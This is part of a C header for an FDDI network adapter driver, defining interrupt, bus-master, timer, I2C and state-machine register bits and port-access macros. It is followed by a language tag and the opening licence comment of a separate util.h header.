#define	IS_PLINT2	(1L<<19)	/* Bit 19:	IRQ_IFCP_4 */
#define	IS_MINTR3	(1L<<18)	/* Bit 18:	IRQ_IFCP_3/IRQ_PHY */
#define	IS_MINTR2	(1L<<17)	/* Bit 17:	IRQ_IFCP_2/IRQ_MAC_2 */
#define	IS_MINTR1	(1L<<16)	/* Bit 16:	IRQ_IFCP_1/IRQ_MAC_1 */
/* Receive Queue 1 */
#define	IS_R1_P		(1L<<15)	/* Bit 15:	Parity Error (q1) */
#define	IS_R1_B		(1L<<14)	/* Bit 14:	End of Buffer (q1) */
#define	IS_R1_F		(1L<<13)	/* Bit 13:	End of Frame (q1) */
#define	IS_R1_C		(1L<<12)	/* Bit 12:	Encoding Error (q1) */
/* Receive Queue 2 */
#define	IS_R2_P		(1L<<11)	/* Bit 11: (DV)	Parity Error (q2) */
#define	IS_R2_B		(1L<<10)	/* Bit 10: (DV)	End of Buffer (q2) */
#define	IS_R2_F		(1L<<9)		/* Bit 9: (DV)	End of Frame (q2) */
#define	IS_R2_C		(1L<<8)		/* Bit 8: (DV)	Encoding Error (q2) */
/* Asynchronous Transmit queue */
	/* Bit 7:	reserved */
#define	IS_XA_B		(1L<<6)		/* Bit 6:	End of Buffer (xa) */
#define	IS_XA_F		(1L<<5)		/* Bit 5:	End of Frame (xa) */
#define	IS_XA_C		(1L<<4)		/* Bit 4:	Encoding Error (xa) */
/* Synchronous Transmit queue */
	/* Bit 3:	reserved */
#define	IS_XS_B		(1L<<2)		/* Bit 2:	End of Buffer (xs) */
#define	IS_XS_F		(1L<<1)		/* Bit 1:	End of Frame (xs) */
#define	IS_XS_C		(1L<<0)		/* Bit 0:	Encoding Error (xs) */

/*
 * Define all valid interrupt source Bits from GET_ISR ()
 */
#define	ALL_IRSR	0x01ffff77L	/* (DV) */
#define
ALL_IRSR_ML 0x0ffff077L /* (ML) */ /* B0_IMSK 32 bit Interrupt mask register */ /* * The Bit definnition of this register are the same as of the interrupt * source register. These definition are directly derived from the Hardware * spec. */ /* Bit 31..28: reserved */ #define IRQ_I2C_READY (1L<<27) /* Bit 27: (ML) IRQ on end of I2C tx */ #define IRQ_SW (1L<<26) /* Bit 26: (ML) SW forced IRQ */ #define IRQ_EXT_REG (1L<<25) /* Bit 25: (ML) IRQ from external reg*/ #define IRQ_STAT (1L<<24) /* Bit 24: IRQ status exception */ /* PERR, RMABORT, RTABORT DATAPERR */ #define IRQ_MST_ERR (1L<<23) /* Bit 23: IRQ master error */ /* RMABORT, RTABORT, DATAPERR */ #define IRQ_TIMER (1L<<22) /* Bit 22: IRQ_TIMER */ #define IRQ_RTM (1L<<21) /* Bit 21: IRQ_RTM */ #define IRQ_DAS (1L<<20) /* Bit 20: IRQ_PHY_DAS */ #define IRQ_IFCP_4 (1L<<19) /* Bit 19: IRQ_IFCP_4 */ #define IRQ_IFCP_3 (1L<<18) /* Bit 18: IRQ_IFCP_3/IRQ_PHY */ #define IRQ_IFCP_2 (1L<<17) /* Bit 17: IRQ_IFCP_2/IRQ_MAC_2 */ #define IRQ_IFCP_1 (1L<<16) /* Bit 16: IRQ_IFCP_1/IRQ_MAC_1 */ /* Receive Queue 1 */ #define IRQ_R1_P (1L<<15) /* Bit 15: Parity Error (q1) */ #define IRQ_R1_B (1L<<14) /* Bit 14: End of Buffer (q1) */ #define IRQ_R1_F (1L<<13) /* Bit 13: End of Frame (q1) */ #define IRQ_R1_C (1L<<12) /* Bit 12: Encoding Error (q1) */ /* Receive Queue 2 */ #define IRQ_R2_P (1L<<11) /* Bit 11: (DV) Parity Error (q2) */ #define IRQ_R2_B (1L<<10) /* Bit 10: (DV) End of Buffer (q2) */ #define IRQ_R2_F (1L<<9) /* Bit 9: (DV) End of Frame (q2) */ #define IRQ_R2_C (1L<<8) /* Bit 8: (DV) Encoding Error (q2) */ /* Asynchronous Transmit queue */ /* Bit 7: reserved */ #define IRQ_XA_B (1L<<6) /* Bit 6: End of Buffer (xa) */ #define IRQ_XA_F (1L<<5) /* Bit 5: End of Frame (xa) */ #define IRQ_XA_C (1L<<4) /* Bit 4: Encoding Error (xa) */ /* Synchronous Transmit queue */ /* Bit 3: reserved */ #define IRQ_XS_B (1L<<2) /* Bit 2: End of Buffer (xs) */ #define IRQ_XS_F (1L<<1) /* Bit 1: End of Frame (xs) */ #define IRQ_XS_C (1L<<0) /* 
Bit 0: Encoding Error (xs) */ /* 0x0010 - 0x006b: formac+ (supernet_3) fequently used registers */ /* B0_R1_CSR 32 bit BMU control/status reg (rec q 1 ) */ /* B0_R2_CSR 32 bit BMU control/status reg (rec q 2 ) */ /* B0_XA_CSR 32 bit BMU control/status reg (a xmit q ) */ /* B0_XS_CSR 32 bit BMU control/status reg (s xmit q ) */ /* The registers are the same as B4_R1_CSR, B4_R2_CSR, B5_Xa_CSR, B5_XS_CSR */ /* B2_MAC_0 8 bit MAC address Byte 0 */ /* B2_MAC_1 8 bit MAC address Byte 1 */ /* B2_MAC_2 8 bit MAC address Byte 2 */ /* B2_MAC_3 8 bit MAC address Byte 3 */ /* B2_MAC_4 8 bit MAC address Byte 4 */ /* B2_MAC_5 8 bit MAC address Byte 5 */ /* B2_MAC_6 8 bit MAC address Byte 6 (== 0) (DV) */ /* B2_MAC_7 8 bit MAC address Byte 7 (== 0) (DV) */ /* B2_CONN_TYP 8 bit Connector type */ /* B2_PMD_TYP 8 bit PMD type */ /* Values of connector and PMD type comply to SysKonnect internal std */ /* The EPROM register are currently of no use */ /* B2_E_0 8 bit EPROM Byte 0 */ /* B2_E_1 8 bit EPROM Byte 1 */ /* B2_E_2 8 bit EPROM Byte 2 */ /* B2_E_3 8 bit EPROM Byte 3 */ /* B2_FAR 32 bit Flash-Prom Address Register/Counter */ #define FAR_ADDR 0x1ffffL /* Bit 16..0: FPROM Address mask */ /* B2_FDP 8 bit Flash-Prom Data Port */ /* B2_LD_CRTL 8 bit loader control */ /* Bits are currently reserved */ /* B2_LD_TEST 8 bit loader test */ #define LD_T_ON (1<<3) /* Bit 3: Loader Testmode on */ #define LD_T_OFF (1<<2) /* Bit 2: Loader Testmode off */ #define LD_T_STEP (1<<1) /* Bit 1: Decrement FPROM addr. 
Counter */ #define LD_START (1<<0) /* Bit 0: Start loading FPROM */ /* B2_TI_INI 32 bit Timer init value */ /* B2_TI_VAL 32 bit Timer value */ /* B2_TI_CRTL 8 bit Timer control */ /* B2_TI_TEST 8 Bit Timer Test */ /* B2_WDOG_INI 32 bit Watchdog init value */ /* B2_WDOG_VAL 32 bit Watchdog value */ /* B2_WDOG_CRTL 8 bit Watchdog control */ /* B2_WDOG_TEST 8 Bit Watchdog Test */ /* B2_RTM_INI 32 bit RTM init value */ /* B2_RTM_VAL 32 bit RTM value */ /* B2_RTM_CRTL 8 bit RTM control */ /* B2_RTM_TEST 8 Bit RTM Test */ /* B2_<TIM>_CRTL 8 bit <TIM> control */ /* B2_IRQ_MOD_INI 32 bit IRQ Moderation Timer Init Reg. (ML) */ /* B2_IRQ_MOD_VAL 32 bit IRQ Moderation Timer Value (ML) */ /* B2_IRQ_MOD_CTRL 8 bit IRQ Moderation Timer Control (ML) */ /* B2_IRQ_MOD_TEST 8 bit IRQ Moderation Timer Test (ML) */ #define GET_TOK_CT (1<<4) /* Bit 4: Get the Token Counter (RTM) */ #define TIM_RES_TOK (1<<3) /* Bit 3: RTM Status: 1 == restricted */ #define TIM_ALARM (1<<3) /* Bit 3: Timer Alarm (WDOG) */ #define TIM_START (1<<2) /* Bit 2: Start Timer (TI,WDOG,RTM,IRQ_MOD)*/ #define TIM_STOP (1<<1) /* Bit 1: Stop Timer (TI,WDOG,RTM,IRQ_MOD) */ #define TIM_CL_IRQ (1<<0) /* Bit 0: Clear Timer IRQ (TI,WDOG,RTM) */ /* B2_<TIM>_TEST 8 Bit <TIM> Test */ #define TIM_T_ON (1<<2) /* Bit 2: Test mode on (TI,WDOG,RTM,IRQ_MOD) */ #define TIM_T_OFF (1<<1) /* Bit 1: Test mode off (TI,WDOG,RTM,IRQ_MOD) */ #define TIM_T_STEP (1<<0) /* Bit 0: Test step (TI,WDOG,RTM,IRQ_MOD) */ /* B2_TOK_COUNT 0x014c (ML) 32 bit Token Counter */ /* B2_DESC_ADDR_H 0x0150 (ML) 32 bit Desciptor Base Addr Reg High */ /* B2_CTRL_2 0x0154 (ML) 8 bit Control Register 2 */ /* Bit 7..5: reserved */ #define CTRL_CL_I2C_IRQ (1<<4) /* Bit 4: Clear I2C IRQ */ #define CTRL_ST_SW_IRQ (1<<3) /* Bit 3: Set IRQ SW Request */ #define CTRL_CL_SW_IRQ (1<<2) /* Bit 2: Clear IRQ SW Request */ #define CTRL_STOP_DONE (1<<1) /* Bit 1: Stop Master is finished */ #define CTRL_STOP_MAST (1<<0) /* Bit 0: Command Bit to stop the master*/ /* 
B2_IFACE_REG 0x0155 (ML) 8 bit Interface Register */ /* Bit 7..3: reserved */ #define IF_I2C_DATA_DIR (1<<2) /* Bit 2: direction of IF_I2C_DATA*/ #define IF_I2C_DATA (1<<1) /* Bit 1: I2C Data Port */ #define IF_I2C_CLK (1<<0) /* Bit 0: I2C Clock Port */ /* 0x0156: reserved */ /* B2_TST_CTRL_2 0x0157 (ML) 8 bit Test Control Register 2 */ /* Bit 7..4: reserved */ /* force the following error on */ /* the next master read/write */ #define TST_FRC_DPERR_MR64 (1<<3) /* Bit 3: DataPERR RD 64 */ #define TST_FRC_DPERR_MW64 (1<<2) /* Bit 2: DataPERR WR 64 */ #define TST_FRC_APERR_1M64 (1<<1) /* Bit 1: AddrPERR on 1. phase */ #define TST_FRC_APERR_2M64 (1<<0) /* Bit 0: AddrPERR on 2. phase */ /* B2_I2C_CTRL 0x0158 (ML) 32 bit I2C Control Register */ #define I2C_FLAG (1L<<31) /* Bit 31: Start read/write if WR */ #define I2C_ADDR (0x7fffL<<16) /* Bit 30..16: Addr to be read/written*/ #define I2C_DEV_SEL (0x7fL<<9) /* Bit 9..15: I2C Device Select */ /* Bit 5.. 8: reserved */ #define I2C_BURST_LEN (1L<<4) /* Bit 4 Burst Len, 1/4 bytes */ #define I2C_DEV_SIZE (7L<<1) /* Bit 1.. 3: I2C Device Size */ #define I2C_025K_DEV (0L<<1) /* 0: 256 Bytes or smaller*/ #define I2C_05K_DEV (1L<<1) /* 1: 512 Bytes */ #define I2C_1K_DEV (2L<<1) /* 2: 1024 Bytes */ #define I2C_2K_DEV (3L<<1) /* 3: 2048 Bytes */ #define I2C_4K_DEV (4L<<1) /* 4: 4096 Bytes */ #define I2C_8K_DEV (5L<<1) /* 5: 8192 Bytes */ #define I2C_16K_DEV (6L<<1) /* 6: 16384 Bytes */ #define I2C_32K_DEV (7L<<1) /* 7: 32768 Bytes */ #define I2C_STOP_BIT (1<<0) /* Bit 0: Interrupt I2C transfer */ /* * I2C Addresses * * The temperature sensor and the voltage sensor are on the same I2C bus. * Note: The voltage sensor (Micorwire) will be selected by PCI_EXT_PATCH_1 * in PCI_OUR_REG 1. 
*/ #define I2C_ADDR_TEMP 0x90 /* I2C Address Temperature Sensor */ /* B2_I2C_DATA 0x015c (ML) 32 bit I2C Data Register */ /* B4_R1_D 4*32 bit current receive Descriptor (q1) */ /* B4_R1_DA 32 bit current rec desc address (q1) */ /* B4_R1_AC 32 bit current receive Address Count (q1) */ /* B4_R1_BC 32 bit current receive Byte Counter (q1) */ /* B4_R1_CSR 32 bit BMU Control/Status Register (q1) */ /* B4_R1_F 32 bit flag register (q1) */ /* B4_R1_T1 32 bit Test Register 1 (q1) */ /* B4_R1_T2 32 bit Test Register 2 (q1) */ /* B4_R1_T3 32 bit Test Register 3 (q1) */ /* B4_R2_D 4*32 bit current receive Descriptor (q2) */ /* B4_R2_DA 32 bit current rec desc address (q2) */ /* B4_R2_AC 32 bit current receive Address Count (q2) */ /* B4_R2_BC 32 bit current receive Byte Counter (q2) */ /* B4_R2_CSR 32 bit BMU Control/Status Register (q2) */ /* B4_R2_F 32 bit flag register (q2) */ /* B4_R2_T1 32 bit Test Register 1 (q2) */ /* B4_R2_T2 32 bit Test Register 2 (q2) */ /* B4_R2_T3 32 bit Test Register 3 (q2) */ /* B5_XA_D 4*32 bit current receive Descriptor (xa) */ /* B5_XA_DA 32 bit current rec desc address (xa) */ /* B5_XA_AC 32 bit current receive Address Count (xa) */ /* B5_XA_BC 32 bit current receive Byte Counter (xa) */ /* B5_XA_CSR 32 bit BMU Control/Status Register (xa) */ /* B5_XA_F 32 bit flag register (xa) */ /* B5_XA_T1 32 bit Test Register 1 (xa) */ /* B5_XA_T2 32 bit Test Register 2 (xa) */ /* B5_XA_T3 32 bit Test Register 3 (xa) */ /* B5_XS_D 4*32 bit current receive Descriptor (xs) */ /* B5_XS_DA 32 bit current rec desc address (xs) */ /* B5_XS_AC 32 bit current receive Address Count (xs) */ /* B5_XS_BC 32 bit current receive Byte Counter (xs) */ /* B5_XS_CSR 32 bit BMU Control/Status Register (xs) */ /* B5_XS_F 32 bit flag register (xs) */ /* B5_XS_T1 32 bit Test Register 1 (xs) */ /* B5_XS_T2 32 bit Test Register 2 (xs) */ /* B5_XS_T3 32 bit Test Register 3 (xs) */ /* B5_<xx>_CSR 32 bit BMU Control/Status Register (xx) */ #define CSR_DESC_CLEAR (1L<<21) /* Bit 
21: Clear Reset for Descr */ #define CSR_DESC_SET (1L<<20) /* Bit 20: Set Reset for Descr */ #define CSR_FIFO_CLEAR (1L<<19) /* Bit 19: Clear Reset for FIFO */ #define CSR_FIFO_SET (1L<<18) /* Bit 18: Set Reset for FIFO */ #define CSR_HPI_RUN (1L<<17) /* Bit 17: Release HPI SM */ #define CSR_HPI_RST (1L<<16) /* Bit 16: Reset HPI SM to Idle */ #define CSR_SV_RUN (1L<<15) /* Bit 15: Release Supervisor SM */ #define CSR_SV_RST (1L<<14) /* Bit 14: Reset Supervisor SM */ #define CSR_DREAD_RUN (1L<<13) /* Bit 13: Release Descr Read SM */ #define CSR_DREAD_RST (1L<<12) /* Bit 12: Reset Descr Read SM */ #define CSR_DWRITE_RUN (1L<<11) /* Bit 11: Rel. Descr Write SM */ #define CSR_DWRITE_RST (1L<<10) /* Bit 10: Reset Descr Write SM */ #define CSR_TRANS_RUN (1L<<9) /* Bit 9: Release Transfer SM */ #define CSR_TRANS_RST (1L<<8) /* Bit 8: Reset Transfer SM */ /* Bit 7..5: reserved */ #define CSR_START (1L<<4) /* Bit 4: Start Rec/Xmit Queue */ #define CSR_IRQ_CL_P (1L<<3) /* Bit 3: Clear Parity IRQ, Rcv */ #define CSR_IRQ_CL_B (1L<<2) /* Bit 2: Clear EOB IRQ */ #define CSR_IRQ_CL_F (1L<<1) /* Bit 1: Clear EOF IRQ */ #define CSR_IRQ_CL_C (1L<<0) /* Bit 0: Clear ERR IRQ */ #define CSR_SET_RESET (CSR_DESC_SET|CSR_FIFO_SET|CSR_HPI_RST|CSR_SV_RST|\ CSR_DREAD_RST|CSR_DWRITE_RST|CSR_TRANS_RST) #define CSR_CLR_RESET (CSR_DESC_CLEAR|CSR_FIFO_CLEAR|CSR_HPI_RUN|CSR_SV_RUN|\ CSR_DREAD_RUN|CSR_DWRITE_RUN|CSR_TRANS_RUN) /* B5_<xx>_F 32 bit flag register (xx) */ /* Bit 28..31: reserved */ #define F_ALM_FULL (1L<<27) /* Bit 27: (ML) FIFO almost full */ #define F_FIFO_EOF (1L<<26) /* Bit 26: (ML) Fag bit in FIFO */ #define F_WM_REACHED (1L<<25) /* Bit 25: (ML) Watermark reached */ #define F_UP_DW_USED (1L<<24) /* Bit 24: (ML) Upper Dword used (bug)*/ /* Bit 23: reserved */ #define F_FIFO_LEVEL (0x1fL<<16) /* Bit 16..22:(ML) # of Qwords in FIFO*/ /* Bit 8..15: reserved */ #define F_ML_WATER_M 0x0000ffL /* Bit 0.. 
7:(ML) Watermark */ #define FLAG_WATER 0x00001fL /* Bit 4..0:(DV) Level of req data tr.*/ /* B5_<xx>_T1 32 bit Test Register 1 (xx) */ /* Holds four State Machine control Bytes */ #define SM_CRTL_SV (0xffL<<24) /* Bit 31..24: Control Supervisor SM */ #define SM_CRTL_RD (0xffL<<16) /* Bit 23..16: Control Read Desc SM */ #define SM_CRTL_WR (0xffL<<8) /* Bit 15..8: Control Write Desc SM */ #define SM_CRTL_TR (0xffL<<0) /* Bit 7..0: Control Transfer SM */ /* B4_<xx>_T1_TR 8 bit Test Register 1 TR (xx) */ /* B4_<xx>_T1_WR 8 bit Test Register 1 WR (xx) */ /* B4_<xx>_T1_RD 8 bit Test Register 1 RD (xx) */ /* B4_<xx>_T1_SV 8 bit Test Register 1 SV (xx) */ /* The control status byte of each machine looks like ... */ #define SM_STATE 0xf0 /* Bit 7..4: State which shall be loaded */ #define SM_LOAD 0x08 /* Bit 3: Load the SM with SM_STATE */ #define SM_TEST_ON 0x04 /* Bit 2: Switch on SM Test Mode */ #define SM_TEST_OFF 0x02 /* Bit 1: Go off the Test Mode */ #define SM_STEP 0x01 /* Bit 0: Step the State Machine */ /* The coding of the states */ #define SM_SV_IDLE 0x0 /* Supervisor Idle Tr/Re */ #define SM_SV_RES_START 0x1 /* Supervisor Res_Start Tr/Re */ #define SM_SV_GET_DESC 0x3 /* Supervisor Get_Desc Tr/Re */ #define SM_SV_CHECK 0x2 /* Supervisor Check Tr/Re */ #define SM_SV_MOV_DATA 0x6 /* Supervisor Move_Data Tr/Re */ #define SM_SV_PUT_DESC 0x7 /* Supervisor Put_Desc Tr/Re */ #define SM_SV_SET_IRQ 0x5 /* Supervisor Set_Irq Tr/Re */ #define SM_RD_IDLE 0x0 /* Read Desc. Idle Tr/Re */ #define SM_RD_LOAD 0x1 /* Read Desc. Load Tr/Re */ #define SM_RD_WAIT_TC 0x3 /* Read Desc. Wait_TC Tr/Re */ #define SM_RD_RST_EOF 0x6 /* Read Desc. Reset_EOF Re */ #define SM_RD_WDONE_R 0x2 /* Read Desc. Wait_Done Re */ #define SM_RD_WDONE_T 0x4 /* Read Desc. Wait_Done Tr */ #define SM_TR_IDLE 0x0 /* Trans. Data Idle Tr/Re */ #define SM_TR_LOAD 0x3 /* Trans. Data Load Tr/Re */ #define SM_TR_LOAD_R_ML 0x1 /* Trans. Data Load /Re (ML) */ #define SM_TR_WAIT_TC 0x2 /* Trans. 
Data Wait_TC Tr/Re */ #define SM_TR_WDONE 0x4 /* Trans. Data Wait_Done Tr/Re */ #define SM_WR_IDLE 0x0 /* Write Desc. Idle Tr/Re */ #define SM_WR_ABLEN 0x1 /* Write Desc. Act_Buf_Length Tr/Re */ #define SM_WR_LD_A4 0x2 /* Write Desc. Load_A4 Re */ #define SM_WR_RES_OWN 0x2 /* Write Desc. Res_OWN Tr */ #define SM_WR_WAIT_EOF 0x3 /* Write Desc. Wait_EOF Re */ #define SM_WR_LD_N2C_R 0x4 /* Write Desc. Load_N2C Re */ #define SM_WR_WAIT_TC_R 0x5 /* Write Desc. Wait_TC Re */ #define SM_WR_WAIT_TC4 0x6 /* Write Desc. Wait_TC4 Re */ #define SM_WR_LD_A_T 0x6 /* Write Desc. Load_A Tr */ #define SM_WR_LD_A_R 0x7 /* Write Desc. Load_A Re */ #define SM_WR_WAIT_TC_T 0x7 /* Write Desc. Wait_TC Tr */ #define SM_WR_LD_N2C_T 0xc /* Write Desc. Load_N2C Tr */ #define SM_WR_WDONE_T 0x9 /* Write Desc. Wait_Done Tr */ #define SM_WR_WDONE_R 0xc /* Write Desc. Wait_Done Re */ #define SM_WR_LD_D_AD 0xe /* Write Desc. Load_Dumr_A Re (ML) */ #define SM_WR_WAIT_D_TC 0xf /* Write Desc. Wait_Dumr_TC Re (ML) */ /* B5_<xx>_T2 32 bit Test Register 2 (xx) */ /* Note: This register is only defined for the transmit queues */ /* Bit 31..8: reserved */ #define AC_TEST_ON (1<<7) /* Bit 7: Address Counter Test Mode on */ #define AC_TEST_OFF (1<<6) /* Bit 6: Address Counter Test Mode off*/ #define BC_TEST_ON (1<<5) /* Bit 5: Byte Counter Test Mode on */ #define BC_TEST_OFF (1<<4) /* Bit 4: Byte Counter Test Mode off */ #define TEST_STEP04 (1<<3) /* Bit 3: Inc AC/Dec BC by 4 */ #define TEST_STEP03 (1<<2) /* Bit 2: Inc AC/Dec BC by 3 */ #define TEST_STEP02 (1<<1) /* Bit 1: Inc AC/Dec BC by 2 */ #define TEST_STEP01 (1<<0) /* Bit 0: Inc AC/Dec BC by 1 */ /* B5_<xx>_T3 32 bit Test Register 3 (xx) */ /* Note: This register is only defined for the transmit queues */ /* Bit 31..8: reserved */ #define T3_MUX_2 (1<<7) /* Bit 7: (ML) Mux position MSB */ #define T3_VRAM_2 (1<<6) /* Bit 6: (ML) Virtual RAM buffer addr MSB */ #define T3_LOOP (1<<5) /* Bit 5: Set Loopback (Xmit) */ #define T3_UNLOOP (1<<4) /* Bit 4: 
Unset Loopback (Xmit) */ #define T3_MUX (3<<2) /* Bit 3..2: Mux position */ #define T3_VRAM (3<<0) /* Bit 1..0: Virtual RAM buffer Address */ /* PCI card IDs */ /* * Note: The following 4 byte definitions shall not be used! Use OEM Concept! */ #define PCI_VEND_ID0 0x48 /* PCI vendor ID (SysKonnect) */ #define PCI_VEND_ID1 0x11 /* PCI vendor ID (SysKonnect) */ /* (High byte) */ #define PCI_DEV_ID0 0x00 /* PCI device ID */ #define PCI_DEV_ID1 0x40 /* PCI device ID (High byte) */ /*#define PCI_CLASS 0x02*/ /* PCI class code: network device */ #define PCI_NW_CLASS 0x02 /* PCI class code: network device */ #define PCI_SUB_CLASS 0x02 /* PCI subclass ID: FDDI device */ #define PCI_PROG_INTFC 0x00 /* PCI programming Interface (=0) */ /* * address transmission from logical to physical offset address on board */ #define FMA(a) (0x0400|((a)<<2)) /* FORMAC+ (r/w) (SN3) */ #define P1(a) (0x0380|((a)<<2)) /* PLC1 (r/w) (DAS) */ #define P2(a) (0x0600|((a)<<2)) /* PLC2 (r/w) (covered by the SN3) */ #define PRA(a) (B2_MAC_0 + (a)) /* configuration PROM (MAC address) */ /* * FlashProm specification */ #define MAX_PAGES 0x20000L /* Every byte has a single page */ #define MAX_FADDR 1 /* 1 byte per page */ /* * Receive / Transmit Buffer Control word */ #define BMU_OWN (1UL<<31) /* OWN bit: 0 == host, 1 == adapter */ #define BMU_STF (1L<<30) /* Start of Frame ? */ #define BMU_EOF (1L<<29) /* End of Frame ? 
*/ #define BMU_EN_IRQ_EOB (1L<<28) /* Enable "End of Buffer" IRQ */ #define BMU_EN_IRQ_EOF (1L<<27) /* Enable "End of Frame" IRQ */ #define BMU_DEV_0 (1L<<26) /* RX: don't transfer to system mem */ #define BMU_SMT_TX (1L<<25) /* TX: if set, buffer type SMT_MBuf */ #define BMU_ST_BUF (1L<<25) /* RX: copy of start of frame */ #define BMU_UNUSED (1L<<24) /* Set if the Descr is curr unused */ #define BMU_SW (3L<<24) /* 2 Bits reserved for SW usage */ #define BMU_CHECK 0x00550000L /* To identify the control word */ #define BMU_BBC 0x0000FFFFL /* R/T Buffer Byte Count */ /* * physical address offset + IO-Port base address */ #ifdef MEM_MAPPED_IO #define ADDR(a) (char far *) smc->hw.iop+(a) #define ADDRS(smc,a) (char far *) (smc)->hw.iop+(a) #else #define ADDR(a) (((a)>>7) ? (outp(smc->hw.iop+B0_RAP,(a)>>7), \ (smc->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) : \ (smc->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) #define ADDRS(smc,a) (((a)>>7) ? (outp((smc)->hw.iop+B0_RAP,(a)>>7), \ ((smc)->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) : \ ((smc)->hw.iop+(((a)&0x7F)|((a)>>7 ? 0x80:0)))) #endif /* * Define a macro to access the configuration space */ #define PCI_C(a) ADDR(B3_CFG_SPC + (a)) /* PCI Config Space */ #define EXT_R(a) ADDR(B6_EXT_REG + (a)) /* External Registers */ /* * Define some values needed for the MAC address (PROM) */ #define SA_MAC (0) /* start addr. MAC_AD within the PROM */ #define PRA_OFF (0) /* offset correction when 4th byte reading */ #define SKFDDI_PSZ 8 /* address PROM size */ #define FM_A(a) ADDR(FMA(a)) /* FORMAC Plus physical addr */ #define P1_A(a) ADDR(P1(a)) /* PLC1 (r/w) */ #define P2_A(a) ADDR(P2(a)) /* PLC2 (r/w) (DAS) */ #define PR_A(a) ADDR(PRA(a)) /* config. 
PROM (MAC address) */ /* * Macro to read the PROM */ #define READ_PROM(a) ((u_char)inp(a)) #define GET_PAGE(bank) outpd(ADDR(B2_FAR),bank) #define VPP_ON() #define VPP_OFF() /* * Note: Values of the Interrupt Source Register are defined above */ #define ISR_A ADDR(B0_ISRC) #define GET_ISR() inpd(ISR_A) #define GET_ISR_SMP(iop) inpd((iop)+B0_ISRC) #define CHECK_ISR() (inpd(ISR_A) & inpd(ADDR(B0_IMSK))) #define CHECK_ISR_SMP(iop) (inpd((iop)+B0_ISRC) & inpd((iop)+B0_IMSK)) #define BUS_CHECK() /* * CLI_FBI: Disable Board Interrupts * STI_FBI: Enable Board Interrupts */ #ifndef UNIX #define CLI_FBI() outpd(ADDR(B0_IMSK),0) #else #define CLI_FBI(smc) outpd(ADDRS((smc),B0_IMSK),0) #endif #ifndef UNIX #define STI_FBI() outpd(ADDR(B0_IMSK),smc->hw.is_imask) #else #define STI_FBI(smc) outpd(ADDRS((smc),B0_IMSK),(smc)->hw.is_imask) #endif #define CLI_FBI_SMP(iop) outpd((iop)+B0_IMSK,0) #define STI_FBI_SMP(smc,iop) outpd((iop)+B0_IMSK,(smc)->hw.is_imask) #endif /* PCI */ /*--------------------------------------------------------------------------*/ /* * 12 bit transfer (dword) counter: * (ISA: 2*trc = number of byte) * (EISA: 4*trc = number of byte) * (MCA: 4*trc = number of byte) */ #define MAX_TRANS (0x0fff) /* * PC PIC */ #define MST_8259 (0x20) #define SLV_8259 (0xA0) #define TPS (18) /* ticks per second */ /* * error timer defs */ #define TN (4) /* number of supported timer = TN+1 */ #define SNPPND_TIME (5) /* buffer memory access over mem. data reg. 
*/ #define MAC_AD 0x405a0000 #define MODR1 FM_A(FM_MDREG1) /* mode register 1 */ #define MODR2 FM_A(FM_MDREG2) /* mode register 2 */ #define CMDR1 FM_A(FM_CMDREG1) /* command register 1 */ #define CMDR2 FM_A(FM_CMDREG2) /* command register 2 */ /* * function defines */ #define CLEAR(io,mask) outpw((io),inpw(io)&(~(mask))) #define SET(io,mask) outpw((io),inpw(io)|(mask)) #define GET(io,mask) (inpw(io)&(mask)) #define SETMASK(io,val,mask) outpw((io),(inpw(io) & ~(mask)) | (val)) /* * PHY Port A (PA) = PLC 1 * With SuperNet 3 PHY-A and PHY S are identical. */ #define PLC(np,reg) (((np) == PA) ? P2_A(reg) : P1_A(reg)) /* * set memory address register for write and read */ #define MARW(ma) outpw(FM_A(FM_MARW),(unsigned int)(ma)) #define MARR(ma) outpw(FM_A(FM_MARR),(unsigned int)(ma)) /* * read/write from/to memory data register */ /* write double word */ #define MDRW(dd) outpw(FM_A(FM_MDRU),(unsigned int)((dd)>>16)) ;\ outpw(FM_A(FM_MDRL),(unsigned int)(dd)) #ifndef WINNT /* read double word */ #define MDRR() (((long)inpw(FM_A(FM_MDRU))<<16) + inpw(FM_A(FM_MDRL))) /* read FORMAC+ 32-bit status register */ #define GET_ST1() (((long)inpw(FM_A(FM_ST1U))<<16) + inpw(FM_A(FM_ST1L))) #define GET_ST2() (((long)inpw(FM_A(FM_ST2U))<<16) + inpw(FM_A(FM_ST2L))) #ifdef SUPERNET_3 #define GET_ST3() (((long)inpw(FM_A(FM_ST3U))<<16) + inpw(FM_A(FM_ST3L))) #endif #else /* read double word */ #define MDRR() inp2w((FM_A(FM_MDRU)),(FM_A(FM_MDRL))) /* read FORMAC+ 32-bit status register */ #define GET_ST1() inp2w((FM_A(FM_ST1U)),(FM_A(FM_ST1L))) #define GET_ST2() inp2w((FM_A(FM_ST2U)),(FM_A(FM_ST2L))) #ifdef SUPERNET_3 #define GET_ST3() inp2w((FM_A(FM_ST3U)),(FM_A(FM_ST3L))) #endif #endif /* Special timer macro for 82c54 */ /* timer access over data bus bit 8..15 */ #define OUT_82c54_TIMER(port,val) outpw(TI_A(port),(val)<<8) #define IN_82c54_TIMER(port) ((inpw(TI_A(port))>>8) & 0xff) #ifdef DEBUG #define DB_MAC(mac,st) {if (debug_mac & 0x1)\ printf("M") ;\ if (debug_mac & 0x2)\ 
printf("\tMAC %d status 0x%08lx\n",mac,st) ;\ if (debug_mac & 0x4)\ dp_mac(mac,st) ;\ } #define DB_PLC(p,iev) { if (debug_plc & 0x1)\ printf("P") ;\ if (debug_plc & 0x2)\ printf("\tPLC %s Int 0x%04x\n", \ (p == PA) ? "A" : "B", iev) ;\ if (debug_plc & 0x4)\ dp_plc(p,iev) ;\ } #define DB_TIMER() { if (debug_timer & 0x1)\ printf("T") ;\ if (debug_timer & 0x2)\ printf("\tTimer ISR\n") ;\ } #else /* no DEBUG */ #define DB_MAC(mac,st) #define DB_PLC(p,iev) #define DB_TIMER() #endif /* no DEBUG */ #define INC_PTR(sp,cp,ep) if (++cp == ep) cp = sp /* * timer defs */ #define COUNT(t) ((t)<<6) /* counter */ #define RW_OP(o) ((o)<<4) /* read/write operation */ #define TMODE(m) ((m)<<1) /* timer mode */ #endif
{ "language": "C" }
#ifndef _UTIL_H
#define _UTIL_H

/*
 * Copyright 2008 Jon Loeliger, Freescale Semiconductor, Inc.
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License as
 * published by the Free Software Foundation; either version 2 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
